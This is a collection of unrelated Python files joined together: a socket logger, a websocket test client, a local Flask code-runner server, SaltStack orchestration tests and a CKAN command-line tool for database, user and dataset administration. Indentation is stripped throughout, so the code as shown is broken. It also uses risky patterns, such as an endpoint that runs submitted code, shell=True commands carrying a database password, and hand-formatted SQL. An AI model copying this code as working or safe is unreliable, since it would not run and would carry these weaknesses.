def __init__(self, server_address, handler_class):
socketserver.TCPServer.__init__(self, server_address, handler_class)
def connect_logger(host, port):
"""
This method starts a simple server which listens on a port for a
client to connect and start writing messages. Whenever a message
is received, it is written to sys.stderr. The server is run in
a daemon thread from the caller, which is killed when the caller
thread dies.
If the socket is in use, then the server tries to listen on the
next port (port + 1). After 25 tries, it gives up.
:param str host: Hostname for server.
:param int port: Port to listen on.
"""
server = None
tries = 0
max_tries = 25
while not server:
try:
server = SimpleServer((host, port), LoggingTCPHandler)
except socket.error:
port += 1
tries += 1
if tries >= max_tries:
sys.stderr.write(
'WARNING: Could not find a free port for logger, maximum retries {} exceeded.'.format(max_tries))
return
t = Thread(target=server.serve_forever, args=())
# The thread should be a daemon so that it shuts down when the parent thread is killed
t.daemon = True
t.start()
Env.jutils().addSocketAppender(host, port)
|
testWordSending.py
|
import websocket
import time
import threading
try:
import thread
except ImportError:
import _thread as thread
num = 10
msg = ""
def worker():
global msg
global num
if msg == "end":
print("")
time.sleep(8)
else:
print(num)
ws.send(str(num))
num += 1
time.sleep(8)
def schedule(interval, wait=True):
base_time = time.time()
next_time = 0
while True:
t = threading.Thread(target=worker)
t.start()
# print(msg)
if wait:
t.join()
next_time = ((base_time - time.time()) % interval) or interval
time.sleep(next_time)
# websocketの通信がエラー状態の時
def main():
schedule(1, False)
def on_message(ws, message):
global msg
msg = message
# print(msg)
def on_error(ws, error):
print(error)
# websocketの通信が閉じた時
def on_close(ws):
print("### closed ###")
# websocketの通信中の時
def on_open(ws):
def run(*args):
main()
ws.close()
print("thread terminating...")
thread.start_new_thread(run, ())
if __name__ == '__main__':
websocket.enableTrace(True)
ws = websocket.WebSocketApp("ws://127.0.0.1:5000",
on_error=on_error,
on_close=on_close,
on_message=on_message)
ws.on_open = on_open
ws.run_forever()
# execution()
|
local_server.py
|
import os.path
import threading
from flask import Flask
from code_runner import CodeRunner
from config import INDEX_HTML_PATH, FLASK_PORT
server = Flask(__name__)
def start():
thr = threading.Thread(target=server.run, kwargs={'port': FLASK_PORT})
thr.daemon = True # local server will exit automatically after main thread exits
thr.start()
@server.route('/code', methods=['PUT'])
def run():
from flask import request
res, ok = CodeRunner().run_code(request.json["is_input_from_file"], request.json["is_output_to_file"],
request.json["input"], request.json["output"], request.json["code"])
return {'console_output': res, 'pass': ok}
@server.route('/', methods=['GET'])
def index():
with open(INDEX_HTML_PATH) as f:
return f.read()
if __name__ == '__main__':
server.run(port=2998)
|
test_state.py
|
# -*- coding: utf-8 -*-
'''
Tests for the state runner
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import errno
import os
import shutil
import signal
import tempfile
import textwrap
import threading
from salt.ext.six.moves import queue
# Import Salt Testing Libs
from tests.support.case import ShellCase
from tests.support.unit import skipIf
from tests.support.paths import TMP
# Import Salt Libs
import salt.utils.platform
import salt.utils.event
import salt.utils.files
import salt.utils.json
import salt.utils.stringutils
import salt.utils.yaml
# Import 3rd-party libs
from salt.ext import six
class StateRunnerTest(ShellCase):
'''
Test the state runner.
'''
def add_to_queue(self, q, cmd):
'''
helper method to add salt-run
return data to a queue
'''
ret = self.run_run(cmd)
q.put(ret)
q.task_done()
def test_orchestrate_output(self):
'''
Ensure the orchestrate runner outputs useful state data.
In Issue #31330, the output only contains ['outputter:', ' highstate'],
and not the full stateful return. This tests ensures we don't regress in that
manner again.
Also test against some sample "good" output that would be included in a correct
orchestrate run.
'''
#ret_output = self.run_run_plus('state.orchestrate', 'orch.simple')['out']
ret_output = self.run_run('state.orchestrate orch.simple')
bad_out = ['outputter:', ' highstate']
good_out = [' Function: salt.state',
' Result: True',
'Succeeded: 1 (changed=1)',
'Failed: 0',
'Total states run: 1']
# First, check that we don't have the "bad" output that was displaying in
# Issue #31330 where only the highstate outputter was listed
self.assertIsNot(bad_out, ret_output)
# Now test that some expected good sample output is present in the return.
for item in good_out:
self.assertIn(item, ret_output)
def test_orchestrate_nested(self):
'''
test salt-run state.orchestrate and failhard with nested orchestration
'''
if os.path.exists('/tmp/ewu-2016-12-13'):
os.remove('/tmp/ewu-2016-12-13')
_, code = self.run_run(
'state.orchestrate nested-orch.outer',
with_retcode=True)
self.assertFalse(os.path.exists('/tmp/ewu-2016-12-13'))
self.assertNotEqual(code, 0)
def test_orchestrate_state_and_function_failure(self):
'''
Ensure that returns from failed minions are in the changes dict where
they belong, so they can be programatically analyzed.
See https://github.com/saltstack/salt/issues/43204
'''
self.run_run('saltutil.sync_modules')
ret = salt.utils.json.loads(
'\n'.join(
self.run_run('state.orchestrate orch.issue43204 --out=json')
)
)
# Drill down to the changes dict
state_ret = ret['data']['master']['salt_|-Step01_|-Step01_|-state']['changes']
func_ret = ret['data']['master']['salt_|-Step02_|-runtests_helpers.nonzero_retcode_return_false_|-function']['changes']
# Remove duration and start time from the results, since they would
# vary with each run and that would make it impossible to test.
for item in ('duration', 'start_time'):
state_ret['ret']['minion']['test_|-test fail with changes_|-test fail with changes_|-fail_with_changes'].pop(item)
self.assertEqual(
state_ret,
{
'out': 'highstate',
'ret': {
'minion': {
'test_|-test fail with changes_|-test fail with changes_|-fail_with_changes': {
'__id__': 'test fail with changes',
'__run_num__': 0,
'__sls__': 'orch.issue43204.fail_with_changes',
'changes': {
'testing': {
'new': 'Something pretended to change',
'old': 'Unchanged'
}
},
'comment': 'Failure!',
'name': 'test fail with changes',
'result': False,
}
}
}
}
)
self.assertEqual(
func_ret,
{'out': 'highstate', 'ret': {'minion': False}}
)
def test_orchestrate_target_exists(self):
'''
test orchestration when target exists
while using multiple states
'''
ret = self.run_run('state.orchestrate orch.target-exists')
first = [' ID: core',
' Function: salt.state',
' Result: True']
second = [' ID: test-state',
' Function: salt.state',
' Result: True']
third = [' ID: cmd.run',
' Function: salt.function',
' Result: True']
ret_out = [first, second, third]
for out in ret_out:
for item in out:
self.assertIn(item, ret)
def test_orchestrate_retcode(self):
'''
Test orchestration with nonzero retcode set in __context__
'''
self.run_run('saltutil.sync_runners')
self.run_run('saltutil.sync_wheel')
ret = '\n'.join(self.run_run('state.orchestrate orch.retcode'))
for result in (' ID: test_runner_success\n'
' Function: salt.runner\n'
' Name: runtests_helpers.success\n'
' Result: True',
' ID: test_runner_failure\n'
' Function: salt.runner\n'
' Name: runtests_helpers.failure\n'
' Result: False',
' ID: test_wheel_success\n'
' Function: salt.wheel\n'
' Name: runtests_helpers.success\n'
' Result: True',
' ID: test_wheel_failure\n'
' Function: salt.wheel\n'
' Name: runtests_helpers.failure\n'
' Result: False'):
self.assertIn(result, ret)
def test_orchestrate_target_doesnt_exists(self):
'''
test orchestration when target doesnt exist
while using multiple states
'''
ret = self.run_run('state.orchestrate orch.target-doesnt-exists')
first = ['No minions matched the target. No command was sent, no jid was assigned.',
' ID: core',
' Function: salt.state',
' Result: False']
second = [' ID: test-state',
' Function: salt.state',
' Result: True']
third = [' ID: cmd.run',
' Function: salt.function',
' Result: True']
ret_out = [first, second, third]
for out in ret_out:
for item in out:
self.assertIn(item, ret)
def test_state_event(self):
'''
test to ensure state.event
runner returns correct data
'''
q = queue.Queue(maxsize=0)
cmd = 'state.event salt/job/*/new count=1'
expect = '"minions": ["minion"]'
server_thread = threading.Thread(target=self.add_to_queue, args=(q, cmd))
server_thread.setDaemon(True)
server_thread.start()
while q.empty():
self.run_salt('minion test.ping --static')
out = q.get()
self.assertIn(expect, six.text_type(out))
server_thread.join()
@skipIf(salt.utils.platform.is_windows(), '*NIX-only test')
class OrchEventTest(ShellCase):
'''
Tests for orchestration events
'''
def setUp(self):
self.timeout = 60
self.master_d_dir = os.path.join(self.get_config_dir(), 'master.d')
try:
os.makedirs(self.master_d_dir)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
self.conf = tempfile.NamedTemporaryFile(
mode='w',
suffix='.conf',
dir=self.master_d_dir,
delete=True,
)
self.base_env = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, self.base_env)
self.addCleanup(self.conf.close)
for attr in ('timeout', 'master_d_dir', 'conf', 'base_env'):
self.addCleanup(delattr, self, attr)
# Force a reload of the configuration now that our temp config file has
# been removed.
self.addCleanup(self.run_run_plus, 'test.arg', __reload_config=True)
def alarm_handler(self, signal, frame):
raise Exception('Timeout of {0} seconds reached'.format(self.timeout))
def write_conf(self, data):
'''
Dump the config dict to the conf file
'''
self.conf.write(salt.utils.yaml.safe_dump(data, default_flow_style=False))
self.conf.flush()
def test_jid_in_ret_event(self):
'''
Test to confirm that the ret event for the orchestration contains the
jid for the jobs spawned.
'''
self.write_conf({
'fileserver_backend': ['roots'],
'file_roots': {
'base': [self.base_env],
},
})
state_sls = os.path.join(self.base_env, 'test_state.sls')
with salt.utils.files.fopen(state_sls, 'w') as fp_:
fp_.write(salt.utils.stringutils.to_str(textwrap.dedent('''
date:
cmd.run
''')))
orch_sls = os.path.join(self.base_env, 'test_orch.sls')
with salt.utils.files.fopen(orch_sls, 'w') as fp_:
fp_.write(salt.utils.stringutils.to_str(textwrap.dedent('''
date_cmd:
salt.state:
- tgt: minion
- sls: test_state
ping_minion:
salt.function:
- name: test.ping
- tgt: minion
fileserver.file_list:
salt.runner
config.values:
salt.wheel
''')))
listener = salt.utils.event.get_event(
'master',
sock_dir=self.master_opts['sock_dir'],
transport=self.master_opts['transport'],
opts=self.master_opts)
jid = self.run_run_plus(
'state.orchestrate',
'test_orch',
__reload_config=True).get('jid')
if jid is None:
raise Exception('jid missing from run_run_plus output')
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
if event['tag'] == 'salt/run/{0}/ret'.format(jid):
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event['data']['return']['data']['master']
for job in ret:
self.assertTrue('__jid__' in ret[job])
break
finally:
del listener
signal.alarm(0)
|
cli.py
|
import collections
import csv
import multiprocessing as mp
import os
import datetime
import sys
from pprint import pprint
import re
import ckan.logic as logic
import ckan.model as model
import ckan.include.rjsmin as rjsmin
import ckan.include.rcssmin as rcssmin
import ckan.lib.fanstatic_resources as fanstatic_resources
import sqlalchemy as sa
import urlparse
import routes
import paste.script
from paste.registry import Registry
from paste.script.util.logging_config import fileConfig
#NB No CKAN imports are allowed until after the config file is loaded.
# i.e. do the imports in methods, after _load_config is called.
# Otherwise loggers get disabled.
def parse_db_config(config_key='sqlalchemy.url'):
''' Takes a config key for a database connection url and parses it into
a dictionary. Expects a url like:
'postgres://tester:pass@localhost/ckantest3'
'''
from pylons import config
url = config[config_key]
regex = [
'^\s*(?P<db_type>\w*)',
'://',
'(?P<db_user>[^:]*)',
':?',
'(?P<db_pass>[^@]*)',
'@',
'(?P<db_host>[^/:]*)',
':?',
'(?P<db_port>[^/]*)',
'/',
'(?P<db_name>[\w.-]*)'
]
db_details_match = re.match(''.join(regex), url)
if not db_details_match:
raise Exception('Could not extract db details from url: %r' % url)
db_details = db_details_match.groupdict()
return db_details
class MockTranslator(object):
def gettext(self, value):
return value
def ugettext(self, value):
return value
def ungettext(self, singular, plural, n):
if n > 1:
return plural
return singular
class CkanCommand(paste.script.command.Command):
'''Base class for classes that implement CKAN paster commands to inherit.
'''
parser = paste.script.command.Command.standard_parser(verbose=True)
parser.add_option('-c', '--config', dest='config',
default='development.ini', help='Config file to use.')
parser.add_option('-f', '--file',
action='store',
dest='file_path',
help="File to dump results to (if needed)")
default_verbosity = 1
group_name = 'ckan'
def _get_config(self):
from paste.deploy import appconfig
if not self.options.config:
msg = 'No config file supplied'
raise self.BadCommand(msg)
self.filename = os.path.abspath(self.options.config)
if not os.path.exists(self.filename):
raise AssertionError('Config filename %r does not exist.' % self.filename)
fileConfig(self.filename)
return appconfig('config:' + self.filename)
def _load_config(self):
conf = self._get_config()
assert 'ckan' not in dir() # otherwise loggers would be disabled
# We have now loaded the config. Now we can import ckan for the
# first time.
from ckan.config.environment import load_environment
load_environment(conf.global_conf, conf.local_conf)
self.registry=Registry()
self.registry.prepare()
import pylons
self.translator_obj = MockTranslator()
self.registry.register(pylons.translator, self.translator_obj)
if model.user_table.exists():
# If the DB has already been initialized, create and register
# a pylons context object, and add the site user to it, so the
# auth works as in a normal web request
c = pylons.util.AttribSafeContextObj()
self.registry.register(pylons.c, c)
self.site_user = logic.get_action('get_site_user')({'ignore_auth': True,
'defer_commit': True}, {})
pylons.c.user = self.site_user['name']
pylons.c.userobj = model.User.get(self.site_user['name'])
model.repo.commit_and_remove()
## give routes enough information to run url_for
parsed = urlparse.urlparse(conf.get('ckan.site_url', 'http://0.0.0.0'))
request_config = routes.request_config()
request_config.host = parsed.netloc + parsed.path
request_config.protocol = parsed.scheme
def _setup_app(self):
cmd = paste.script.appinstall.SetupCommand('setup-app')
cmd.run([self.filename])
class ManageDb(CkanCommand):
'''Perform various tasks on the database.
db create - alias of db upgrade
db init - create and put in default data
db clean
db upgrade [version no.] - Data migrate
db version - returns current version of data schema
db dump FILE_PATH - dump to a pg_dump file
db dump-rdf DATASET_NAME FILE_PATH
db simple-dump-csv FILE_PATH - dump just datasets in CSV format
db simple-dump-json FILE_PATH - dump just datasets in JSON format
db user-dump-csv FILE_PATH - dump user information to a CSV file
db send-rdf TALIS_STORE USERNAME PASSWORD
db load FILE_PATH - load a pg_dump from a file
db load-only FILE_PATH - load a pg_dump from a file but don\'t do
the schema upgrade or search indexing
db create-from-model - create database from the model (indexes not made)
db migrate-filestore - migrate all uploaded data from the 2.1 filesore.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
import ckan.lib.search as search
cmd = self.args[0]
if cmd == 'init':
model.repo.init_db()
if self.verbose:
print 'Initialising DB: SUCCESS'
elif cmd == 'clean' or cmd == 'drop':
# remove any *.pyc version files to prevent conflicts
v_path = os.path.join(os.path.dirname(__file__),
'..', 'migration', 'versions', '*.pyc')
import glob
filelist = glob.glob(v_path)
for f in filelist:
os.remove(f)
model.repo.clean_db()
search.clear()
if self.verbose:
print 'Cleaning DB: SUCCESS'
elif cmd == 'upgrade':
if len(self.args) > 1:
model.repo.upgrade_db(self.args[1])
else:
model.repo.upgrade_db()
elif cmd == 'version':
self.version()
elif cmd == 'dump':
self.dump()
elif cmd == 'load':
self.load()
elif cmd == 'load-only':
self.load(only_load=True)
elif cmd == 'simple-dump-csv':
self.simple_dump_csv()
elif cmd == 'simple-dump-json':
self.simple_dump_json()
elif cmd == 'dump-rdf':
self.dump_rdf()
elif cmd == 'user-dump-csv':
self.user_dump_csv()
elif cmd == 'create-from-model':
model.repo.create_db()
if self.verbose:
print 'Creating DB: SUCCESS'
elif cmd == 'send-rdf':
self.send_rdf()
elif cmd == 'migrate-filestore':
self.migrate_filestore()
else:
print 'Command %s not recognized' % cmd
sys.exit(1)
def _get_db_config(self):
return parse_db_config()
def _get_postgres_cmd(self, command):
self.db_details = self._get_db_config()
if self.db_details.get('db_type') not in ('postgres', 'postgresql'):
raise AssertionError('Expected postgres database - not %r' % self.db_details.get('db_type'))
pg_cmd = command
pg_cmd += ' -U %(db_user)s' % self.db_details
if self.db_details.get('db_pass') not in (None, ''):
pg_cmd = 'export PGPASSWORD=%(db_pass)s && ' % self.db_details + pg_cmd
if self.db_details.get('db_host') not in (None, ''):
pg_cmd += ' -h %(db_host)s' % self.db_details
if self.db_details.get('db_port') not in (None, ''):
pg_cmd += ' -p %(db_port)s' % self.db_details
return pg_cmd
def _get_psql_cmd(self):
psql_cmd = self._get_postgres_cmd('psql')
psql_cmd += ' -d %(db_name)s' % self.db_details
return psql_cmd
def _postgres_dump(self, filepath):
pg_dump_cmd = self._get_postgres_cmd('pg_dump')
pg_dump_cmd += ' %(db_name)s' % self.db_details
pg_dump_cmd += ' > %s' % filepath
self._run_cmd(pg_dump_cmd)
print 'Dumped database to: %s' % filepath
def _postgres_load(self, filepath):
import ckan.model as model
assert not model.repo.are_tables_created(), "Tables already found. You need to 'db clean' before a load."
pg_cmd = self._get_psql_cmd() + ' -f %s' % filepath
self._run_cmd(pg_cmd)
print 'Loaded CKAN database: %s' % filepath
def _run_cmd(self, command_line):
import subprocess
retcode = subprocess.call(command_line, shell=True)
if retcode != 0:
raise SystemError('Command exited with errorcode: %i' % retcode)
def dump(self):
if len(self.args) < 2:
print 'Need pg_dump filepath'
return
dump_path = self.args[1]
psql_cmd = self._get_psql_cmd() + ' -f %s'
pg_cmd = self._postgres_dump(dump_path)
def load(self, only_load=False):
if len(self.args) < 2:
print 'Need pg_dump filepath'
return
dump_path = self.args[1]
psql_cmd = self._get_psql_cmd() + ' -f %s'
pg_cmd = self._postgres_load(dump_path)
if not only_load:
print 'Upgrading DB'
import ckan.model as model
model.repo.upgrade_db()
print 'Rebuilding search index'
import ckan.lib.search
ckan.lib.search.rebuild()
else:
print 'Now remember you have to call \'db upgrade\' and then \'search-index rebuild\'.'
print 'Done'
def simple_dump_csv(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need csv file path'
return
dump_filepath = self.args[1]
import ckan.lib.dumper as dumper
dump_file = open(dump_filepath, 'w')
dumper.SimpleDumper().dump(dump_file, format='csv')
def simple_dump_json(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need json file path'
return
dump_filepath = self.args[1]
import ckan.lib.dumper as dumper
dump_file = open(dump_filepath, 'w')
dumper.SimpleDumper().dump(dump_file, format='json')
def dump_rdf(self):
if len(self.args) < 3:
print 'Need dataset name and rdf file path'
return
package_name = self.args[1]
rdf_path = self.args[2]
import ckan.model as model
import ckan.lib.rdf as rdf
pkg = model.Package.by_name(unicode(package_name))
if not pkg:
print 'Dataset name "%s" does not exist' % package_name
return
rdf = rdf.RdfExporter().export_package(pkg)
f = open(rdf_path, 'w')
f.write(rdf)
f.close()
def user_dump_csv(self):
if len(self.args) < 2:
print 'Need csv file path'
return
dump_filepath = self.args[1]
import ckan.lib.dumper as dumper
dump_file = open(dump_filepath, 'w')
dumper.UserDumper().dump(dump_file)
def send_rdf(self):
if len(self.args) < 4:
print 'Need all arguments: {talis-store} {username} {password}'
return
talis_store = self.args[1]
username = self.args[2]
password = self.args[3]
import ckan.lib.talis
talis = ckan.lib.talis.Talis()
return talis.send_rdf(talis_store, username, password)
def migrate_filestore(self):
from ckan.model import Session
import requests
from ckan.lib.uploader import ResourceUpload
results = Session.execute("select id, revision_id, url from resource "
"where resource_type = 'file.upload' "
"and (url_type <> 'upload' or url_type is null)"
"and url like '%storage%'")
for id, revision_id, url in results:
response = requests.get(url, stream=True)
if response.status_code != 200:
print "failed to fetch %s (code %s)" % (url,
response.status_code)
continue
resource_upload = ResourceUpload({'id': id})
assert resource_upload.storage_path, "no storage configured aborting"
directory = resource_upload.get_directory(id)
filepath = resource_upload.get_path(id)
try:
os.makedirs(directory)
except OSError, e:
## errno 17 is file already exists
if e.errno != 17:
raise
with open(filepath, 'wb+') as out:
for chunk in response.iter_content(1024):
if chunk:
out.write(chunk)
Session.execute("update resource set url_type = 'upload'"
"where id = '%s'" % id)
Session.execute("update resource_revision set url_type = 'upload'"
"where id = '%s' and "
"revision_id = '%s'" % (id, revision_id))
Session.commit()
print "Saved url %s" % url
def version(self):
from ckan.model import Session
print Session.execute('select version from migrate_version;').fetchall()
class SearchIndexCommand(CkanCommand):
'''Creates a search index for all datasets
Usage:
search-index [-i] [-o] [-r] [-e] rebuild [dataset_name] - reindex dataset_name if given, if not then rebuild
full search index (all datasets)
search-index rebuild_fast - reindex using multiprocessing using all cores.
This acts in the same way as rubuild -r [EXPERIMENTAL]
search-index check - checks for datasets not indexed
search-index show DATASET_NAME - shows index of a dataset
search-index clear [dataset_name] - clears the search index for the provided dataset or
for the whole ckan instance
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 0
def __init__(self,name):
super(SearchIndexCommand,self).__init__(name)
self.parser.add_option('-i', '--force', dest='force',
action='store_true', default=False, help='Ignore exceptions when rebuilding the index')
self.parser.add_option('-o', '--only-missing', dest='only_missing',
action='store_true', default=False, help='Index non indexed datasets only')
self.parser.add_option('-r', '--refresh', dest='refresh',
action='store_true', default=False, help='Refresh current index (does not clear the existing one)')
self.parser.add_option('-e', '--commit-each', dest='commit_each',
action='store_true', default=False, help=
'''Perform a commit after indexing each dataset. This ensures that changes are
immediately available on the search, but slows significantly the process.
Default is false.'''
)
def command(self):
if not self.args:
# default to printing help
print self.usage
return
cmd = self.args[0]
# Do not run load_config yet
if cmd == 'rebuild_fast':
self.rebuild_fast()
return
self._load_config()
if cmd == 'rebuild':
self.rebuild()
elif cmd == 'check':
self.check()
elif cmd == 'show':
self.show()
elif cmd == 'clear':
self.clear()
else:
print 'Command %s not recognized' % cmd
def rebuild(self):
from ckan.lib.search import rebuild, commit
# BY default we don't commit after each request to Solr, as it is
# a really heavy operation and slows things a lot
if len(self.args) > 1:
rebuild(self.args[1])
else:
rebuild(only_missing=self.options.only_missing,
force=self.options.force,
refresh=self.options.refresh,
defer_commit=(not self.options.commit_each))
if not self.options.commit_each:
commit()
def check(self):
from ckan.lib.search import check
check()
def show(self):
from ckan.lib.search import show
if not len(self.args) == 2:
print 'Missing parameter: dataset-name'
return
index = show(self.args[1])
pprint(index)
def clear(self):
from ckan.lib.search import clear
package_id =self.args[1] if len(self.args) > 1 else None
clear(package_id)
def rebuild_fast(self):
### Get out config but without starting pylons environment ####
conf = self._get_config()
### Get ids using own engine, otherwise multiprocess will balk
db_url = conf['sqlalchemy.url']
engine = sa.create_engine(db_url)
package_ids = []
result = engine.execute("select id from package where state = 'active';")
for row in result:
package_ids.append(row[0])
def start(ids):
## load actual enviroment for each subprocess, so each have thier own
## sa session
self._load_config()
from ckan.lib.search import rebuild, commit
rebuild(package_ids=ids)
commit()
def chunks(l, n):
""" Yield n successive chunks from l.
"""
newn = int(len(l) / n)
for i in xrange(0, n-1):
yield l[i*newn:i*newn+newn]
yield l[n*newn-newn:]
processes = []
for chunk in chunks(package_ids, mp.cpu_count()):
process = mp.Process(target=start, args=(chunk,))
processes.append(process)
process.daemon = True
process.start()
for process in processes:
process.join()
class Notification(CkanCommand):
'''Send out modification notifications.
In "replay" mode, an update signal is sent for each dataset in the database.
Usage:
notify replay - send out modification signals
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
from ckan.model import Session, Package, DomainObjectOperation
from ckan.model.modification import DomainObjectModificationExtension
if not self.args:
# default to run
cmd = 'replay'
else:
cmd = self.args[0]
if cmd == 'replay':
dome = DomainObjectModificationExtension()
for package in Session.query(Package):
dome.notify(package, DomainObjectOperation.changed)
else:
print 'Command %s not recognized' % cmd
class RDFExport(CkanCommand):
'''Export active datasets as RDF
This command dumps out all currently active datasets as RDF into the
specified folder.
Usage:
paster rdf-export /path/to/store/output
'''
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
self._load_config()
if not self.args:
# default to run
print RDFExport.__doc__
else:
self.export_datasets( self.args[0] )
def export_datasets(self, out_folder):
'''
Export datasets as RDF to an output folder.
'''
import urlparse
import urllib2
import pylons.config as config
import ckan.model as model
import ckan.logic as logic
import ckan.lib.helpers as h
# Create output folder if not exists
if not os.path.isdir( out_folder ):
os.makedirs( out_folder )
fetch_url = config['ckan.site_url']
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
dataset_names = logic.get_action('package_list')(context, {})
for dataset_name in dataset_names:
dd = logic.get_action('package_show')(context, {'id':dataset_name })
if not dd['state'] == 'active':
continue
url = h.url_for( controller='package',action='read',
id=dd['name'])
url = urlparse.urljoin(fetch_url, url[1:]) + '.rdf'
try:
fname = os.path.join( out_folder, dd['name'] ) + ".rdf"
r = urllib2.urlopen(url).read()
with open(fname, 'wb') as f:
f.write(r)
except IOError, ioe:
sys.stderr.write( str(ioe) + "\n" )
class Sysadmin(CkanCommand):
'''Gives sysadmin rights to a named user
Usage:
sysadmin - lists sysadmins
sysadmin list - lists sysadmins
sysadmin add USERNAME - add a user as a sysadmin
sysadmin remove USERNAME - removes user from sysadmins
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
cmd = self.args[0] if self.args else None
if cmd == None or cmd == 'list':
self.list()
elif cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
else:
print 'Command %s not recognized' % cmd
def list(self):
import ckan.model as model
print 'Sysadmins:'
sysadmins = model.Session.query(model.User).filter_by(sysadmin=True)
print 'count = %i' % sysadmins.count()
for sysadmin in sysadmins:
print '%s name=%s id=%s' % (sysadmin.__class__.__name__,
sysadmin.name,
sysadmin.id)
def add(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user to be made sysadmin.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'User "%s" not found' % username
makeuser = raw_input('Create new user: %s? [y/n]' % username)
if makeuser == 'y':
password = UserCmd.password_prompt()
print('Creating %s user' % username)
user = model.User(name=unicode(username),
password=password)
else:
print 'Exiting ...'
return
user.sysadmin = True
model.Session.add(user)
model.repo.commit_and_remove()
print 'Added %s as sysadmin' % username
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user to be made sysadmin.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'Error: user "%s" not found!' % username
return
user.sysadmin = False
model.repo.commit_and_remove()
class UserCmd(CkanCommand):
'''Manage users
Usage:
user - lists users
user list - lists users
user USERNAME - shows user properties
user add USERNAME [FIELD1=VALUE1 FIELD2=VALUE2 ...]
- add a user (prompts for password
if not supplied).
Field can be: apikey
password
email
user setpass USERNAME - set user password (prompts)
user remove USERNAME - removes user from users
user search QUERY - searches for a user name
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
if not self.args:
self.list()
else:
cmd = self.args[0]
if cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
elif cmd == 'search':
self.search()
elif cmd == 'setpass':
self.setpass()
elif cmd == 'list':
self.list()
else:
self.show()
def get_user_str(self, user):
user_str = 'name=%s' % user.name
if user.name != user.display_name:
user_str += ' display=%s' % user.display_name
return user_str
def list(self):
import ckan.model as model
print 'Users:'
users = model.Session.query(model.User)
print 'count = %i' % users.count()
for user in users:
print self.get_user_str(user)
def show(self):
import ckan.model as model
username = self.args[0]
user = model.User.get(unicode(username))
print 'User: \n', user
def setpass(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
return
username = self.args[1]
user = model.User.get(username)
print('Editing user: %r' % user.name)
password = self.password_prompt()
user.password = password
model.repo.commit_and_remove()
print 'Done'
def search(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need user name query string.'
return
query_str = self.args[1]
query = model.User.search(query_str)
print '%i users matching %r:' % (query.count(), query_str)
for user in query.all():
print self.get_user_str(user)
@classmethod
def password_prompt(cls):
import getpass
password1 = None
while not password1:
password1 = getpass.getpass('Password: ')
password2 = getpass.getpass('Confirm password: ')
if password1 != password2:
print 'Passwords do not match'
sys.exit(1)
return password1
def add(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
sys.exit(1)
username = self.args[1]
# parse args into data_dict
data_dict = {'name': username}
for arg in self.args[2:]:
try:
field, value = arg.split('=', 1)
data_dict[field] = value
except ValueError:
raise ValueError('Could not parse arg: %r (expected "<option>=<value>)"' % arg)
if 'password' not in data_dict:
data_dict['password'] = self.password_prompt()
print('Creating user: %r' % username)
try:
import ckan.logic as logic
site_user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {
'model': model,
'session': model.Session,
'ignore_auth': True,
'user': site_user['name'],
}
user_dict = logic.get_action('user_create')(context, data_dict)
pprint(user_dict)
except logic.ValidationError, e:
print e
sys.exit(1)
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'Error: user "%s" not found!' % username
return
user.delete()
model.repo.commit_and_remove()
print('Deleted user: %s' % username)
class DatasetCmd(CkanCommand):
'''Manage datasets
Usage:
dataset DATASET_NAME|ID - shows dataset properties
dataset show DATASET_NAME|ID - shows dataset properties
dataset list - lists datasets
dataset delete [DATASET_NAME|ID] - changes dataset state to 'deleted'
dataset purge [DATASET_NAME|ID] - removes dataset from db entirely
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
if not self.args:
print self.usage
else:
cmd = self.args[0]
if cmd == 'delete':
self.delete(self.args[1])
elif cmd == 'purge':
self.purge(self.args[1])
elif cmd == 'list':
self.list()
elif cmd == 'show':
self.show(self.args[1])
else:
self.show(self.args[0])
def list(self):
import ckan.model as model
print 'Datasets:'
datasets = model.Session.query(model.Package)
print 'count = %i' % datasets.count()
for dataset in datasets:
state = ('(%s)' % dataset.state) if dataset.state != 'active' \
else ''
print '%s %s %s' % (dataset.id, dataset.name, state)
def _get_dataset(self, dataset_ref):
import ckan.model as model
dataset = model.Package.get(unicode(dataset_ref))
assert dataset, 'Could not find dataset matching reference: %r' % dataset_ref
return dataset
def show(self, dataset_ref):
import pprint
dataset = self._get_dataset(dataset_ref)
pprint.pprint(dataset.as_dict())
def delete(self, dataset_ref):
import ckan.model as model
dataset = self._get_dataset(dataset_ref)
old_state = dataset.state
rev = model.repo.new_revision()
dataset.delete()
model.repo.commit_and_remove()
dataset = self._get_dataset(dataset_ref)
print '%s %s -> %s' % (dataset.name, old_state, dataset.state)
def purge(self, dataset_ref):
import ckan.model as model
dataset = self._get_dataset(dataset_ref)
name = dataset.name
rev = model.repo.new_revision()
dataset.purge()
